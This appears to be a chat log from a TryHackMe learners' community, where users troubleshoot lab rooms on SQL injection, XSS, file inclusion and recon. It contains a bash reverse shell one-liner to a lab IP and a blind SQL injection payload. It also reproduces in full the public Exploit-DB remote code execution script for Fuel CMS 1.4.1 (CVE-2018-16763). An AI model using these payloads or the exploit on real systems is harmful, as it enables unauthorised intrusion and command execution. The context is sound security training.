File Inclusion, IDOR and Auth bypass
Wait, what! You told me to send a screenshot?
@steel nymph in the last challenge it's showing me 22%
What to do now?
Well I said lemme see it. Guess I wasn't clear sorry
I'm sorry if I didn't see. I'm having a really bad connection rn
Damn! And I thought you were looking into something lol
Wait, sending
Ok
It gives START_PENDING on sc start and never actually starts
Reset the box
@steel nymph can i dm you?
You're using the backup.sh file right? Send me a screenshot of what you wrote in the file
I tried many revshell commands
For example: sh -i >& /dev/tcp/10.2.97.169/4444 0>&1
Send me a screenshot of whatever you have in there now
oh
okay
Yeah, did
hope it works
Same result. Start pending
Actually the command ran. I logged as jack but service still pending
Yeah! What should someone learn from this room? I mean it's not usual to not get the revshell
Yeah! This is a lesson for me
haha
Hey, having trouble with manual discovery - robots.txt. Going to the IP/robots.txt doesn't take me anywhere, just "site can't be reached".
AttackBox, got it now. Had to restart the AttackBox
SQL injection task 8, going to lose my mind, this is my syntax, what am I doing wrong: https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--
@modest arch the next question asks for Matt's password. What wordlist should I use to crack the hash?
rockyou isn't working
Yeah, I did
Now I unshadowed
What's next?
Which wordlist to use?
You get 5 sec?
Umm okay! Lemme try again
showing 15
yes it worked
Try putting u before %
Lol, I was giving the wrong directory
Now I'm getting 5
then keep working on it
Damn! Hahaha! I need to make a revision lol
Username?
You can check, and if it's right, keep going.
Ok, I have that, now what should I do next?
Now find other columns
Task 8: https://tryhackme.com/room/xssgi
nc not catching anything.
The listener THM offered only caught a DNS request and nothing else.
Filtering through other people's posts, this doesn't seem to be resolved yet
I couldn't get nc to work either, the THM listener worked finally after I just reset the machine and tried again
it should catch http too
After you get to the THM catcher website, follow the instructions and make your own ticket with this payload, it should work
Thanks. Apparently closing the site and closing tun0 wasn't enough. Had to close the browser and start a new session to make it work.
Gave +1 Rep to @opal stirrup
On Task 7 of Passive Recon, you're supposed to look up the 3rd most common port used for ngnix, but when I enter the port number I get "wrong answer"
I think im getting it now, Thank you!
Gave +1 Rep to @tulip elm
From 10 to 100?
Task 7 of the Passive Recon room is Summary
The answer didn't change, look at top ports
I think you're looking at the wrong thing
thank you for the help!
welcome
If I could spell properly! I'm stpud
not ngNix but ngINx..
thanks @thick valley
Gave +1 Rep to @thick valley
oh man I didn't even catch that but that's just unlucky
Hello, I'm stuck on Vulnerability Capstone, trying to get the flag but can get a reverse shell. I'm using CVE-2018-16763 but the shell isn't stable, I'm quite new to setting up a stable shell and can't find anything that can work
In Traceroute A, what is the IP address of the last router/hop before reaching tryhackme.com? (I entered the correct answer but still it is not accepting it). Can anyone help with this? Room Name - Active Reconnaissance
Check what the 13th is
I entered this IP 100.92.9.83 . But still it is not accepting
It's the first one, you can see by looking at the answer *
It's pretty obvious, come on, I just did it
Could anyone give me a hint for File Inclusion Task 4, Question 2? "In Lab #2, what is the directory specified in the include function?" I can see people have said to look at the error message but I'm not sure where to see the error messages?
try to generate an error message
Yes I have been, I just keep coming to the Firefox "Unable to connect" page instead of an error that seems related to the task
Not sure if I'm just totally missing something
Hmm, you are
Can you show your screenshot?
so you go to the website, select lab #1 and you get "unable to connect"?
Yeah, a screenshot will help, are you using the AttackBox or VPN?
Anyone redeemed the Hak5 Pineapple yet?
looks like no one has redeemed anything yet
Oh, how can you tell?
Go to the page that's in announcements
Gave +1 Rep to @visual crest
Counter seems to be broken
I've got bad luck, just finished all rooms, no more tickets for me
maybe it is
Gave +1 Rep to @deft valley
@deft valley @visual crest I think it was an issue with my machine, I restarted it and I'm seeing the error messages now. Thanks for the help tho!
@visual crest thanks
Loved the content, privesc and SQLi were awesome
Aw, it won't let me
@visual crest thanks
Gave +1 Rep to @visual crest
I got you
thank you lol
SQLi nearly snapped my laptop in half
xD yeah
I'm wondering, has anyone done this without the AttackBox, using their own VM? If so how, without giving too much away
Yes, I did it on my own box, you need to be connected to the VPN
I was, but the RCE that I could find didn't work, I couldn't find a good way to fix it and couldn't upload anything
Did you look at the RCE? It has a requirement there for something to be running
Also you have to make sure you modify it for your system
Yes, but no stable shell and I couldn't get it to become one (I'm not great with getting a stable shell, I tried to look it up and it didn't work) and tried my best to modify the code to come back to my VM
So how about in your own words, just to validate, what did you do to the exploit or do because of the exploit?
And you can spoiler as well
There is a reverse shell from elsewhere on THM. I have a copy if you want it. I used it to solve the room
Oh, and that's a good question, where did you get the exploit from?
Can someone help on SQL injection Task 8? "where database() like 'u%'" is not running as expected...
||# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

import requests
import urllib

url = "http://VUL_MACHINE_IP/"

def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://ACK_MACHINE_IP:8080"}
    r = requests.get(burp0_url, proxies=proxy)
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print (r.text[0:dup])||
I got it from exploit-db
ok so you have the right exploit and right ip
Are you following the same instructions as in task 6?
That one didn't work for me
I would be interested in the exploit you used, thanks!
Gave +1 Rep to @dull turtle
sure
||Do you also have burp suite running?||
||No, sometimes it prevents my Firefox from running properly, I know how to fix it but I have to restart my VM||
Yeah, you need that in order for that exploit to run
That's either not working...
||ah, not nc?||